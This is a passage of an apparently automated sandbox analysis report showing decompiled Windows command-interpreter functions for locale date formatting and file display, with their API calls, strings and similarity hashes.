						_t72 =  *_t62;
						if(_t72 !=  *_t71) {
							break;
						}
						if(_t72 == 0) {
							L27:
							_t62 = 0;
							L5:
							 *0x4a754090 = _t62;
							goto L6;
						}
						_t72 =  *((intOrPtr*)(_t62 + 2));
						_t24 = _t71 + 2; // 0x90900000
						if(_t72 !=  *_t24) {
							break;
						}
						_t62 = _t62 + 4;
						_t71 = _t71 + 4;
						if(_t72 != 0) {
							continue;
						}
						goto L27;
					}
					asm("sbb eax, eax");
					asm("sbb eax, 0xffffffff");
					goto L5;
				}
			}

0x4a7388e4
0x4a7388eb
0x4a7388f1
0x4a7388f6
0x4a738907
0x4a738911
0x4a744cc9
0x4a744cc9
0x4a738930
0x4a738953
0x4a738953
0x4a73895a
0x4a73895b
0x4a73895c
0x4a738961
0x4a738971
0x4a738976
0x4a73898d
0x4a738991
0x4a738994
0x4a73899d
0x4a7389a0
0x4a744cfc
0x4a744cfd
0x4a744d1b
0x4a744d25
0x4a744cff
0x4a744d00
0x4a744d06
0x4a744d0c
0x4a744d0c
0x4a744d00
0x4a7389a6
0x4a7389a6
0x4a7389ad
0x4a7389ad
0x4a7389a0
0x4a7389c7
0x4a7389d1
0x4a7389dd
0x4a7389dd
0x4a7389fb
0x4a744d3c
0x4a744d3c
0x4a738a14
0x4a744d4d
0x4a744d4d
0x4a738a2d
0x4a744d5e
0x4a744d5e
0x4a738a46
0x4a744d6f
0x4a744d6f
0x4a738a5f
0x4a744d80
0x4a744d80
0x4a738a78
0x4a744d91
0x4a744d91
0x4a738a91
0x4a744da2
0x4a744da2
0x4a738aaa
0x4a744db3
0x4a744db3
0x4a738ab2
0x4a738ac6
0x4a744dc4
0x4a744dc4
0x4a738adf
0x4a744dd5
0x4a744dd5
0x4a738aec
0x4a738b02
0x4a738932
0x4a738932
0x4a738937
0x4a73893d
0x4a73893d
0x4a738943
0x00000000
0x00000000
0x4a744cd6
0x4a744cf5
0x4a744cf5
0x4a73894e
0x4a73894e
0x00000000
0x4a73894e
0x4a744cd8
0x4a744cdc
0x4a744ce0
0x00000000
0x00000000
0x4a744ce6
0x4a744ce9
0x4a744cef
0x00000000
0x00000000
0x00000000
0x4a744cef
0x4a738949
0x4a73894b
0x00000000
0x4a73894b

APIs

Part of subcall function 4A73756D: GetUserDefaultLCID.KERNEL32(4A7427B1,0000001F,?,00000080), ref: 4A73756D

GetLocaleInfoW.KERNEL32(00000000,0000001E,4A754950,00000008,4A755260,?,00000104), ref: 4A73890D
GetLocaleInfoW.KERNEL32(?,00000023,?,00000080), ref: 4A73892C
GetLocaleInfoW.KERNEL32(?,00000021,?,00000080,4A754B80,00000020,4A738B20,4A754BC0,00000020,4A738B24), ref: 4A73898D
GetLocaleInfoW.KERNEL32(?,00000024,?,00000080), ref: 4A7389CD
GetLocaleInfoW.KERNEL32(?,0000001D,4A754940,00000008), ref: 4A7389F7
GetLocaleInfoW.KERNEL32(?,00000031,4A754D80,00000020), ref: 4A738A10
GetLocaleInfoW.KERNEL32(?,00000032,4A754D40,00000020), ref: 4A738A29
GetLocaleInfoW.KERNEL32(?,00000033,4A754D00,00000020), ref: 4A738A42
GetLocaleInfoW.KERNEL32(?,00000034,4A754CC0,00000020), ref: 4A738A5B
GetLocaleInfoW.KERNEL32(?,00000035,4A754C80,00000020), ref: 4A738A74
GetLocaleInfoW.KERNEL32(?,00000036,4A754C40,00000020), ref: 4A738A8D
GetLocaleInfoW.KERNEL32(?,00000037,4A754C00,00000020), ref: 4A738AA6
GetLocaleInfoW.KERNEL32(?,0000000E,4A754930,00000008), ref: 4A738AC2
GetLocaleInfoW.KERNEL32(?,0000000F,4A754920,00000008), ref: 4A738ADB
setlocale.MSVCRT ref: 4A738AEC

Strings

Sun, xrefs: 4A744DAC
1, xrefs: 4A7389D3
Mon, xrefs: 4A744D46
Tue, xrefs: 4A744D57
Wed, xrefs: 4A744D68
.OCP, xrefs: 4A738AE5
Fri, xrefs: 4A744D8A
Sat, xrefs: 4A744D9B
Thu, xrefs: 4A744D79
MM/dd/yy, xrefs: 4A7389AD

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: InfoLocale$DefaultUsersetlocale
String ID: .OCP$1$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed
API String ID: 1351325837-1452651164
Opcode ID: 99549313aa28f1ad0a84935fe50f5582e66cabe77ce4a5682d5fa2be1e4b304a
Instruction ID: b7d9db9a07801c8a77351c78f42d66b3bd5a8ab266afd9105b35bd219426e974
Opcode Fuzzy Hash: 99549313aa28f1ad0a84935fe50f5582e66cabe77ce4a5682d5fa2be1e4b304a
Instruction Fuzzy Hash: 527129B158C526BAEB701721CC45FEB6E7DEB91B98F020055F641B9182CBB4CE8DDB24

Uniqueness

Uniqueness Score: -1.00%

Function 4A7439B6, Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 371
fileCOMMONCrypto

Download Yara Rule

C-Code - Quality: 57%

			E4A7439B6(WCHAR* __ecx, unsigned int __edx, WCHAR* _a4) {
				signed int _v8;
				void _v522;
				char _v524;
				short _v1044;
				short _v4116;
				union _LARGE_INTEGER _v4120;
				int _v4124;
				long _v4128;
				int _v4132;
				long _v4136;
				void* _v4140;
				int _v4144;
				short* _v4148;
				signed int _v4152;
				signed int _v4156;
				int _v4160;
				char _v4164;
				signed int _v4168;
				WCHAR* _v4172;
				signed int _v4176;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t120;
				struct %anon52 _t122;
				WCHAR* _t123;
				long _t127;
				struct %anon52 _t129;
				void* _t131;
				void* _t135;
				long _t137;
				unsigned int _t140;
				long _t141;
				signed char* _t142;
				void* _t146;
				int _t147;
				long _t160;
				long _t162;
				long _t163;
				long _t164;
				long _t165;
				void* _t174;
				long _t175;
				long _t183;
				WCHAR* _t186;
				void* _t187;
				int _t194;
				long _t201;
				long _t202;
				signed int _t203;
				void* _t211;
				int _t214;
				long _t215;
				signed int _t218;
				void* _t219;
				void* _t222;

				_t208 = __edx;
				_t188 = __ecx;
				E4A732C26(0x104c);
				_t120 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t120 ^ _t218;
				_v4168 = _v4168 | 0xffffffff;
				_t186 = _a4;
				_t214 = 0;
				_t211 = 1;
				_v4172 = _t186;
				_v4140 = 0;
				_v4164 = 0x7fffffff;
				_v4156 = 0;
				_v4152 = 0;
				_v4160 = 1;
				_t122 = E4A7339EF(_t186, 0);
				_v4120.LowPart = _t122;
				if(_t122 == 0xffffffff) {
					_t123 = E4A73321B(__ecx, L"DPATH");
					__eflags = _t123;
					if(_t123 == 0) {
						L11:
						__eflags =  *0x4a754128 - 0x7b;
						if( *0x4a754128 == 0x7b) {
							 *0x4a754128 = 2;
						}
						E4A74056B( *0x4a754128);
						L14:
						_t214 = _t211;
						L7:
						return E4A7313A9(_t214, _t186, _v8 ^ _t218, _t208, _t211, _t214);
					}
					_t188 =  &_v1044;
					_t127 = SearchPathW(_t123, _t186, 0, 0x104,  &_v1044, 0);
					__eflags = _t127;
					if(_t127 == 0) {
						goto L11;
					}
					_t129 = E4A7339EF( &_v1044, 0);
					_v4120.LowPart = _t129;
					__eflags = _t129 - 0xffffffff;
					if(_t129 != 0xffffffff) {
						goto L1;
					}
					goto L11;
				}
				L1:
				_v4148 =  &_v524;
				_t131 = E4A733B03( &_v524, _t188, _v4120.LowPart);
				_t186 = __imp___get_osfhandle;
				if(_t131 == 0) {
					_t183 = GetFileSize( *_t186( &_v4164), _v4120.LowPart);
					_v4168 = _t183;
					SetFilePointer( *_t186(_t214), _v4120.LowPart, _t214, _t214);
					_v4156 = _t211;
					_v4152 = _t214;
				}
				while(1) {
					_t222 =  *0x4a7541b4 - _t214; // 0x0
					if(_t222 != 0) {
						break;
					}
					_t135 =  *_t186(_v4120.LowPart,  &_v524, 0x200,  &_v4124, _t214);
					_t211 = ReadFile;
					_pop(_t191);
					if(ReadFile(_t135, ??, ??, ??, ??) == 0) {
						L75:
						_t137 = GetLastError();
						_push(_t214);
						 *0x4a754128 = _t137;
						_push(_t137);
						L76:
						E4A736D44(_t191);
						L6:
						E4A733AB3(_v4120.LowPart);
						goto L7;
					}
					if(_v4124 != _t214) {
						__eflags = _v4160 - _t214;
						if(_v4160 != _t214) {
							__eflags = _v524 - 0xfeff;
							_t191 = 0 | _v524 == 0x0000feff;
							_v4140 = _t191;
							__eflags = _t191 - _t214;
							if(_t191 != _t214) {
								_t35 =  &_v4124;
								 *_t35 = _v4124 - 2;
								__eflags =  *_t35;
								memmove( &_v524,  &_v522, _v4124);
								_t219 = _t219 + 0xc;
							}
						}
						_t140 = _v4124;
						_v4144 = _t140;
						__eflags = _v4140 - _t214;
						if(_v4140 == _t214) {
							_t141 = E4A734490(_t140, 1);
							__eflags = _t141;
							if(_t141 != 0) {
								L24:
								_t194 = _v4124;
								_t142 =  &_v524;
								_v4132 = _t194;
								__eflags = _t194 - _t214;
								if(_t194 <= _t214) {
									L31:
									_v4148 = _t214;
									_t146 = E4A74E4DC(1,  &_v524,  &_v4144,  &_v4148);
									__eflags = _t146 - _t214;
									if(_t146 != _t214) {
										_t147 = _v4124;
										L35:
										_t149 = MultiByteToWideChar( *0x4a7541b8, _t214,  &_v524, _t147,  &_v4116, 0x400);
										_v4132 = _t149;
										__eflags = _t149 - _t214;
										if(_t149 == _t214) {
											_t149 = 0x400;
											_v4132 = 0x400;
										}
										_t191 =  &_v4116;
										_v4148 =  &_v4116;
										goto L38;
									}
									_t147 = _v4144;
									__eflags = _t147 - _t214;
									if(_t147 != _t214) {
										goto L35;
									}
									goto L6;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									_t203 =  *_t142 & 0x000000ff;
									__eflags =  *((char*)(_t203 + 0x4a754e40));
									if( *((char*)(_t203 + 0x4a754e40)) == 0) {
										goto L27;
									}
									L26:
									_t142 =  &(_t142[1]);
									_t49 =  &_v4132;
									 *_t49 = _v4132 - 1;
									__eflags =  *_t49;
									if( *_t49 == 0) {
										_t174 =  *_t186(_v4120.LowPart, _t142, 1,  &_v4132, _t214);
										_pop(_t191);
										_t175 = ReadFile(_t174, ??, ??, ??, ??);
										__eflags = _t175;
										if(_t175 == 0) {
											goto L75;
										}
										_t55 =  &_v4124;
										 *_t55 = 1 + _v4124;
										__eflags =  *_t55;
										_v4144 = _v4124;
										goto L31;
									}
									L27:
									_t142 =  &(_t142[1]);
									_t51 =  &_v4132;
									 *_t51 = _v4132 - 1;
									__eflags =  *_t51;
									if( *_t51 == 0) {
										goto L31;
									}
									L25:
									_t203 =  *_t142 & 0x000000ff;
									__eflags =  *((char*)(_t203 + 0x4a754e40));
									if( *((char*)(_t203 + 0x4a754e40)) == 0) {
										goto L27;
									}
									goto L26;
								}
							}
							__eflags =  *0x4a770668 - _t141; // 0x0
							if(__eflags != 0) {
								goto L24;
							}
							_t149 = _v4124;
							goto L20;
						} else {
							_t149 = _t140 >> 1;
							__eflags = _t149;
							L20:
							_v4132 = _t149;
							L38:
							__eflags = _v4160 - _t214;
							if(_v4160 != _t214) {
								__eflags =  *0x4a7540f4 - _t214; // 0x0
								if(__eflags != 0) {
									E4A736D44(_t191, 0x2354, 1, _v4172);
									_t219 = _t219 + 0xc;
								}
								_t149 = _v4132;
								_v4160 = _t214;
							}
							__eflags = _t149 - _t214;
							_t211 = _v4148;
							_v4128 = _t149;
							if(_t149 <= _t214) {
								L67:
								__eflags = _v4156 | _v4152;
								if((_v4156 | _v4152) != 0) {
									__eflags = 0;
									 *_t186( &_v4156, 1);
									SetFilePointerEx(0, _v4120.LowPart, 0, 0);
								}
								__eflags = _v4124 - _v4144;
								if(_v4124 != _v4144) {
									goto L6;
								} else {
									__eflags = _v4164 - _v4152;
									if(__eflags < 0) {
										goto L6;
									}
									if(__eflags > 0) {
										L73:
										_t211 = 1;
										continue;
									}
									__eflags = _v4168 - _v4156;
									if(_v4168 <= _v4156) {
										goto L6;
									}
									goto L73;
								}
							} else {
								do {
									_t215 = 0x50;
									__eflags = _v4128 - _t215;
									if(_v4128 > _t215) {
										L45:
										__eflags =  *0x4a7541b4;
										if( *0x4a7541b4 != 0) {
											E4A733AB3(_v4120.LowPart);
											_t214 = 1;
											goto L7;
										}
										_t160 = E4A734490(_t149, 1);
										__eflags = _t160;
										if(_t160 == 0) {
											__eflags =  *0x4a770668;
											if( *0x4a770668 != 0) {
												__eflags = _v4140;
												if(_v4140 == 0) {
													L55:
													_t187 = _t215 + _t215;
													_t162 = E4A73453E( &_v4136, 1, _t211, _t187,  &_v4136);
													__eflags = _v4140;
													if(_v4140 != 0) {
														 *((short*)(_t187 + _t211)) = _v4176;
													}
													_t191 = _v4136;
													_t186 = __imp___get_osfhandle;
													_t208 = _t191 >> 1;
													_t102 =  &_v4128;
													 *_t102 = _v4128 - (_t191 >> 1);
													__eflags =  *_t102;
													L58:
													_t211 = _t211 + _t191;
													__eflags = _t211;
													L59:
													__eflags = _t162;
													if(_t162 == 0) {
														L61:
														_t163 = GetLastError();
														 *0x4a754128 = _t163;
														__eflags = _t163;
														if(_t163 == 0) {
															 *0x4a754128 = 0x70;
														}
														_t214 = 1;
														_t164 = E4A733B03(_t163, _t191, 1);
														__eflags = _t164;
														if(_t164 == 0) {
															_t165 = E4A736BEA(_t164, 1);
															__eflags = _t165;
															if(_t165 == 0) {
																E4A74056B( *0x4a754128);
																goto L6;
															}
															_push(0);
															_push(0x2364);
															goto L76;
														} else {
															_push(0);
															_push(0x1d);
															_t149 = E4A736D44(_t191);
															goto L65;
														}
													}
													_t149 = _t215 + _t215;
													__eflags = _t191 - _t215 + _t215;
													if(_t191 == _t215 + _t215) {
														goto L65;
													}
													goto L61;
												}
												L54:
												_v4176 =  *(_t211 + _t215 * 2) & 0x0000ffff;
												__eflags = 0;
												 *(_t211 + _t215 * 2) = 0;
												goto L55;
											}
											__eflags = _v4140;
											if(_v4140 != 0) {
												goto L54;
											}
											L52:
											_t162 = WriteFile( *_t186(0), 1, _t211, _t215,  &_v4136);
											_t201 = _v4136;
											_v4128 = _v4128 - _t201;
											_t211 = _t211 + _t201;
											_t191 = _t201 + _t201;
											_v4136 = _t191;
											goto L59;
										}
										_t162 = WriteConsoleW(GetStdHandle(0xfffffff5), _t211, _t215,  &_v4136, 0);
										__eflags = _t162;
										if(_t162 == 0) {
											goto L52;
										}
										_t202 = _v4136;
										__eflags = _t202 - _t215;
										if(_t202 != _t215) {
											goto L52;
										}
										_v4128 = _v4128 - _t202;
										_t191 = _t202 + _t202;
										_v4136 = _t191;
										goto L58;
									}
									_t215 = _v4128;
									__eflags = _t215;
									if(_t215 == 0) {
										break;
									}
									goto L45;
									L65:
									__eflags = _v4128;
								} while (_v4128 > 0);
								_t214 = 0;
								__eflags = 0;
								goto L67;
							}
						}
					}
					goto L6;
				}
				E4A733AB3(_v4120);
				goto L14;
			}

0x4a7439b6
0x4a7439b6
0x4a7439c0
0x4a7439c5
0x4a7439cc
0x4a7439cf
0x4a7439d7
0x4a7439dc
0x4a7439e1
0x4a7439e3
0x4a7439e9
0x4a7439ef
0x4a7439f9
0x4a7439ff
0x4a743a05
0x4a743a0b
0x4a743a10
0x4a743a19
0x4a746093
0x4a746098
0x4a74609a
0x4a7460d2
0x4a7460d2
0x4a7460d9
0x4a7460db
0x4a7460db
0x4a7460eb
0x4a7460f0
0x4a7460f0
0x4a743acd
0x4a743add
0x4a743add
0x4a74609d
0x4a7460ac
0x4a7460b2
0x4a7460b4
0x00000000
0x00000000
0x4a7460be
0x4a7460c3
0x4a7460c9
0x4a7460cc
0x00000000
0x00000000
0x00000000
0x4a7460cc
0x4a743a1f
0x4a743a2b
0x4a743a31
0x4a743a36
0x4a743a3e
0x4a743a51
0x4a743a60
0x4a743a6a
0x4a743a70
0x4a743a76
0x4a743a76
0x4a743a7c
0x4a743a7c
0x4a743a82
0x00000000
0x00000000
0x4a743aa2
0x4a743aa4
0x4a743aaa
0x4a743ab0
0x4a746470
0x4a746470
0x4a746476
0x4a746477
0x4a74647c
0x4a74647d
0x4a74647d
0x4a743ac2
0x4a743ac8
0x00000000
0x4a743ac8
0x4a743abc
0x4a7460f7
0x4a7460fd
0x4a746106
0x4a74610d
0x4a746110
0x4a746116
0x4a746118
0x4a74611a
0x4a74611a
0x4a74611a
0x4a746135
0x4a74613b
0x4a74613b
0x4a746118
0x4a74613e
0x4a746144
0x4a74614a
0x4a746150
0x4a746161
0x4a746166
0x4a746168
0x4a74617a
0x4a74617a
0x4a746180
0x4a746186
0x4a74618c
0x4a74618e
0x4a7461e1
0x4a7461f8
0x4a7461fe
0x4a746203
0x4a746205
0x4a746216
0x4a74621c
0x4a746238
0x4a74623e
0x4a746244
0x4a746246
0x4a746248
0x4a74624a
0x4a74624a
0x4a746250
0x4a746256
0x00000000
0x4a746256
0x4a746207
0x4a74620d
0x4a74620f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x4a746190
0x4a746190
0x4a746190
0x4a746193
0x4a74619a
0x00000000
0x00000000
0x4a74619c
0x4a74619c
0x4a74619d
0x4a74619d
0x4a74619d
0x4a7461a3
0x4a7461c1
0x4a7461c3
0x4a7461c5
0x4a7461c7
0x4a7461c9
0x00000000
0x00000000
0x4a7461cf
0x4a7461cf
0x4a7461cf
0x4a7461db
0x00000000
0x4a7461db
0x4a7461a5
0x4a7461a5
0x4a7461a6
0x4a7461a6
0x4a7461a6
0x4a7461ac
0x00000000
0x00000000
0x4a746190
0x4a746190
0x4a746193
0x4a74619a
0x00000000
0x00000000
0x00000000
0x4a74619a
0x4a746190
0x4a74616a
0x4a746170
0x00000000
0x00000000
0x4a746172
0x00000000
0x4a746152
0x4a746152
0x4a746152
0x4a746154
0x4a746154
0x4a74625c
0x4a74625c
0x4a746262
0x4a746264
0x4a74626a
0x4a746279
0x4a74627e
0x4a74627e
0x4a746281
0x4a746287
0x4a746287
0x4a74628d
0x4a74628f
0x4a746295
0x4a74629b
0x4a7463f5
0x4a7463fb
0x4a746401
0x4a74640c
0x4a746416
0x4a74641a
0x4a74641a
0x4a746426
0x4a74642c
0x00000000
0x4a746432
0x4a746438
0x4a74643e
0x00000000
0x00000000
0x4a746444
0x4a746458
0x4a74645a
0x00000000
0x4a74645a
0x4a74644c
0x4a746452
0x00000000
0x00000000
0x00000000
0x4a746452
0x4a7462a1
0x4a7462a1
0x4a7462a3
0x4a7462a4
0x4a7462aa
0x4a7462ba
0x4a7462ba
0x4a7462c1
0x4a74648f
0x4a746496
0x00000000
0x4a746496
0x4a7462c9
0x4a7462ce
0x4a7462d0
0x4a74630d
0x4a746314
0x4a74634e
0x4a746355
0x4a746367
0x4a74636e
0x4a746375
0x4a74637a
0x4a746381
0x4a74638a
0x4a74638a
0x4a74638e
0x4a746394
0x4a74639c
0x4a74639e
0x4a74639e
0x4a74639e
0x4a7463a4
0x4a7463a4
0x4a7463a4
0x4a7463a6
0x4a7463a6
0x4a7463a8
0x4a7463b1
0x4a7463b1
0x4a7463b7
0x4a7463bc
0x4a7463be
0x4a7463c0
0x4a7463c0
0x4a7463cc
0x4a7463ce
0x4a7463d3
0x4a7463d5
0x4a74649d
0x4a7464a2
0x4a7464a4
0x4a7464b5
0x00000000
0x4a7464b5
0x4a7464a6
0x4a7464a8
0x00000000
0x4a7463db
0x4a7463db
0x4a7463dd
0x4a7463df
0x00000000
0x4a7463e5
0x4a7463d5
0x4a7463aa
0x4a7463ad
0x4a7463af
0x00000000
0x00000000
0x00000000
0x4a7463af
0x4a746357
0x4a74635b
0x4a746361
0x4a746363
0x00000000
0x4a746363
0x4a746316
0x4a74631d
0x00000000
0x00000000
0x4a74631f
0x4a746330
0x4a746336
0x4a74633c
0x4a746342
0x4a746344
0x4a746346
0x00000000
0x4a746346
0x4a7462e6
0x4a7462ec
0x4a7462ee
0x00000000
0x00000000
0x4a7462f0
0x4a7462f6
0x4a7462f8
0x00000000
0x00000000
0x4a7462fa
0x4a746300
0x4a746302
0x00000000
0x4a746302
0x4a7462ac
0x4a7462b2
0x4a7462b4
0x00000000
0x00000000
0x00000000
0x4a7463e6
0x4a7463e6
0x4a7463e6
0x4a7463f3
0x4a7463f3
0x00000000
0x4a7463f3
0x4a74629b
0x4a746150
0x00000000
0x4a743abc
0x4a746466
0x00000000

APIs

SearchPathW.KERNEL32 ref: 4A7460AC

Part of subcall function 4A733B03: _get_osfhandle.MSVCRT ref: 4A733B0D
Part of subcall function 4A733B03: GetFileType.KERNEL32(00000000), ref: 4A733B17

_get_osfhandle.MSVCRT ref: 4A743A4D
GetFileSize.KERNEL32(00000000), ref: 4A743A51
_get_osfhandle.MSVCRT ref: 4A743A66
SetFilePointer.KERNEL32(00000000), ref: 4A743A6A
_get_osfhandle.MSVCRT ref: 4A743AA2
ReadFile.KERNEL32(00000000), ref: 4A743AAC

Strings

DPATH, xrefs: 4A74608E

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: File_get_osfhandle$PathPointerReadSearchSizeType
String ID: DPATH
API String ID: 1209024715-2010427443
Opcode ID: 54aa06ad3257d601e8cec87d17f6c7daff9c765d967babf085eeeb122e2833dd
Instruction ID: c13f944efe92c87ce24dd242eea254dd4c77500765baaf744c19b772d4421822
Opcode Fuzzy Hash: 54aa06ad3257d601e8cec87d17f6c7daff9c765d967babf085eeeb122e2833dd
Instruction Fuzzy Hash: A3E183B1D492A8EBDF708B60CC89ADDBBB8EB04750F0141D6E589E6141D7B49EC8CF64

Uniqueness

Uniqueness Score: -1.00%

Function 4A74270D, Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 336
timeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E4A74270D(intOrPtr _a4, intOrPtr _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v72;
				short _v328;
				signed int _v332;
				signed int _v336;
				int _v340;
				signed short _v350;
				signed short _v352;
				signed short _v354;
				struct _SYSTEMTIME _v356;
				struct _FILETIME _v364;
				struct _FILETIME _v372;
				void _v408;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				intOrPtr _t84;
				signed int _t93;
				int _t96;
				void* _t107;
				int _t109;
				int _t110;
				int _t120;
				long _t125;
				short* _t127;
				void* _t134;
				void* _t135;
				void* _t141;
				int _t149;
				void* _t155;
				signed int _t160;
				void* _t163;
				void* _t164;
				void _t165;
				int _t168;
				void _t169;
				int _t171;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t72 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t72 ^ _t176;
				_v340 = _a12;
				_v332 = 1;
				if(_a4 == 0) {
					GetSystemTime( &_v356);
					SystemTimeToFileTime( &_v356,  &_v364);
				} else {
					__ecx = 9;
					 &_v364 =  &_v408;
					__edi =  &_v408;
					__eax = memcpy( &_v408, __esi, __ecx << 2);
					__edi = __esi + __ecx;
					__edi = __esi + __ecx + __ecx;
					__ecx = 0;
					__eax = E4A7430B6( &_v408,  &_v364);
				}
				FileTimeToLocalFileTime( &_v364,  &_v372);
				FileTimeToSystemTime( &_v372,  &_v356);
				if( *0x4a754081 == 0) {
					_t171 = _v354 & 0x0000ffff;
					_t168 = _v350 & 0x0000ffff;
					_t149 = _v356 & 0x0000ffff;
					if(_a8 == 0) {
						_t160 = 0x64;
						_t59 = _t149 % _t160;
						_t166 = _t59;
						_t149 = _t59;
					}
					_t84 =  *0x4a7541d0; // 0x0
					if(_t84 != 2) {
						if(_t84 == 1) {
							_t109 = _t171;
							_t171 = _t168;
							_t168 = _t109;
						}
					} else {
						_t110 = _t149;
						_t149 = _t168;
						_t168 = _t171;
						_t171 = _t110;
					}
					if( *0x4a7540dc >= 0x20) {
						L55:
						_push(_t149);
						_push(0x4a754940);
						_push(_t168);
						_push(0x4a754940);
						E4A73179D( *0x4a7540d8,  *0x4a7540dc, L"%02d%s%02d%s%02d", _t171);
						_t149 = _v340;
						_t177 = _t177 + 0x20;
						goto L19;
					} else {
						_t107 = realloc( *0x4a7540d8, 0x40);
						_pop(_t157);
						if(_t107 == 0) {
							L45:
							_push(0);
							_push(8);
							L44:
							E4A736D44(_t157);
							_t93 = 0;
							goto L26;
						}
						 *0x4a7540d8 = _t107;
						 *0x4a7540dc = 0x20;
						goto L55;
					}
				} else {
					_v336 = _v336 & 0x00000000;
					if(GetLocaleInfoW(E4A73756D(), 0x1f,  &_v328, 0x80) == 0) {
						E4A73185A( &_v328, 0x80,  *0x4a7541cc);
					}
					_t171 =  &_v328;
					if(_v328 == 0) {
						L17:
						_t120 = E4A73756D();
						_t168 = GetDateFormatW;
						if(GetDateFormatW(_t120, 0,  &_v356,  &_v328,  *0x4a7540d8,  *0x4a7540dc) == 0 ||  *0x4a7540d8 == 0) {
							goto L1;
						} else {
							L19:
							E4A73185A( &_v72, 0x20, E4A742B93(_v352 & 0x0000ffff));
							if(_t149 == 0) {
								if(_v332 != _t149) {
									if(E4A73661C() == 0) {
										_push( *0x4a7540d8);
										_push( &_v72);
									} else {
										_push( &_v72);
										_push( *0x4a7540d8);
									}
									_push(L"%s %s ");
									_t93 = E4A7358F3();
								} else {
									_t93 = E4A7358F3("%s ",  *0x4a7540d8);
								}
								L26:
								return E4A7313A9(_t93, _t149, _v8 ^ _t176, _t166, _t168, _t171);
							}
							if(_v332 == 0 || _a8 != 1) {
								E4A73185A(_t149, _a16,  *0x4a7540d8);
							} else {
								if(E4A73661C() == 0) {
									E4A73185A(_t149, _a16,  &_v72);
									E4A7320A9(_t171, _t149, _a16, E4A7325B8);
									_push( *0x4a7540d8);
								} else {
									E4A73185A(_t149, _a16,  *0x4a7540d8);
									E4A7320A9(_t171, _t149, _a16, E4A7325B8);
									_push( &_v72);
								}
								_push(_a16);
								_push(_t149);
								E4A7320A9(_t171);
							}
							_t96 = _t149;
							_t166 = _t96 + 2;
							do {
								_t155 =  *_t96;
								_t96 = _t96 + 2;
							} while (_t155 != 0);
							_t93 = _t96 - _t166 >> 1;
							goto L26;
						}
					} else {
						do {
							_t166 =  *_t171 & 0x0000ffff;
							if(_t166 == 0x27) {
								_v336 = 0 | _v336 == 0x00000000;
								L14:
								_t171 = _t171 + 2;
								goto L15;
							}
							if(_v336 != 0 || _t166 != 0x64 && _t166 != 0x4d) {
								goto L14;
							} else {
								_t163 = 0;
								do {
									_t163 = _t163 + 1;
									_t171 = _t171 + 2;
								} while ( *_t171 == _t166);
								_t134 = _t163 + _t163;
								_t175 = _t171 - _t134;
								if(_t163 != 1) {
									if(_t166 == 0x64) {
										_v332 = _v332 & 0x00000000;
									}
									if(_t163 <= 3) {
										_t171 = _t175 + _t134;
									} else {
										_t164 = _t134 + _t175;
										_t135 = _t164;
										_t51 = _t135 + 2; // 0x3
										_t166 = _t51;
										do {
											_t169 =  *_t135;
											_t135 = _t135 + 2;
										} while (_t169 != 0);
										_t171 = _t175 + 6;
										memmove(_t171, _t164, (_t135 - _t166 >> 1) + (_t135 - _t166 >> 1) + 2);
										_t177 = _t177 + 0xc;
									}
									goto L15;
								}
								_t141 = _t175;
								_t36 = _t141 + 2; // 0x4
								_t166 = _t36;
								do {
									_t165 =  *_t141;
									_t141 = _t141 + 2;
								} while (_t165 != 0);
								_t39 = _t175 + 2; // 0x4
								memmove(_t39, _t175, (_t141 - _t166 >> 1) + (_t141 - _t166 >> 1) + 2);
								_t177 = _t177 + 0xc;
								_t171 = _t175 + 4;
							}
							L15:
						} while ( *_t171 != 0);
						_t149 = _v340;
						goto L17;
					}
				}
				L1:
				_t157 =  &_v356;
				_t171 = GetDateFormatW(E4A73756D(), 0,  &_v356,  &_v328, 0, 0);
				if(_t171 == 0) {
					L43:
					_t125 = GetLastError();
					_push(0);
					 *0x4a754128 = _t125;
					_push(_t125);
					goto L44;
				}
				_t171 = _t171 + 1;
				_t127 = realloc( *0x4a7540d8, _t171 + _t171);
				_pop(_t157);
				if(_t127 == 0) {
					goto L45;
				}
				 *0x4a7540d8 = _t127;
				 *0x4a7540dc = _t171;
				if(GetDateFormatW(E4A73756D(), 0,  &_v356,  &_v328, _t127, _t171) != 0) {
					goto L19;
				} else {
					goto L43;
				}
			}

0x4a742718
0x4a74271f
0x4a74272b
0x4a742731
0x4a74273d
0x4a744e4f
0x4a744e63
0x4a742743
0x4a742745
0x4a74274d
0x4a742753
0x4a74275a
0x4a74275a
0x4a74275a
0x4a74275a
0x4a74275c
0x4a74275c
0x4a74276f
0x4a742783
0x4a742790
0x4a744f05
0x4a744f0c
0x4a744f13
0x4a744f1a
0x4a744f22
0x4a744f23
0x4a744f23
0x4a744f25
0x4a744f25
0x4a744f27
0x4a744f2f
0x4a744f3e
0x4a744f40
0x4a744f42
0x4a744f44
0x4a744f44
0x4a744f31
0x4a744f31
0x4a744f33
0x4a744f35
0x4a744f37
0x4a744f37
0x4a744f4d
0x4a744f72
0x4a744f72
0x4a744f78
0x4a744f79
0x4a744f7a
0x4a744f8d
0x4a744f92
0x4a744f98
0x00000000
0x4a744f4f
0x4a744f57
0x4a744f5e
0x4a744f61
0x4a744efb
0x4a744efb
0x4a744efd
0x4a744eed
0x4a744eed
0x4a744ef4
0x00000000
0x4a744ef4
0x4a744f63
0x4a744f68
0x00000000
0x4a744f68
0x4a742796
0x4a742796
0x4a7427ba
0x4a744e7c
0x4a744e7c
0x4a7427c8
0x4a7427ce
0x4a74280e
0x4a74282a
0x4a74282f
0x4a74283a
0x00000000
0x4a74284d
0x4a74284d
0x4a742861
0x4a742868
0x4a744fa6
0x4a744fc9
